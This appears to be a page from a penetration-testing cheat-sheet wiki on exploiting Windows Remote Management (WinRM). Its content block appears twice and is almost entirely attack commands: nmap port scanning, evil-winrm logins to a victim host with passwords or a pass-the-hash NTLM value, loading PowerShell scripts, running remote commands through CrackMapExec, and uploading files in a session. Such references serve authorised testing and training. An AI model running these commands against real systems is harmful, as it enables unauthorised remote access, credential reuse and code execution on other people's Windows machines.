WINRM scanning

nmap -p5985,5986 <IP>

WINRM exploitation

# winrm
evil-winrm -h

# Use NTLM hash with Evil-WinRM to connect
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

#encrypt data with SSL
evil-winrm -i VICTIM_IP -u MyUser -p PASS -s

#load powershell script
evil-winrm -i VICTIM_IP -u MyUser -p PASS -s /path/to/powershell

# Execute a command on a target via WinRM using CrackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

# Upload a file via evil-winrm
# Use the "menu" command in the session to access options like upload, download, etc.
# For example:
menu
Upload <file>

WINRM - 5895-5896

WINRM scanning

nmap -p5985,5986 <IP>

WINRM exploitation

# winrm
evil-winrm -h

# Use NTLM hash with Evil-WinRM to connect
evil-winrm -i VICTIM_IP -u MyUser -H NTLM_HASH

#encrypt data with SSL
evil-winrm -i VICTIM_IP -u MyUser -p PASS -s

#load powershell script
evil-winrm -i VICTIM_IP -u MyUser -p PASS -s /path/to/powershell

# Execute a command on a target via WinRM using CrackMapExec
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"

# Upload a file via evil-winrm
# Use the "menu" command in the session to access options like upload, download, etc.
# For example:
menu
Upload <file>

Resources

A Detailed Guide on Evil-Winrm - Hacking ArticlesHacking Articles

PreviousRPC-NFC NextFTP - 21

Last updated 6 months ago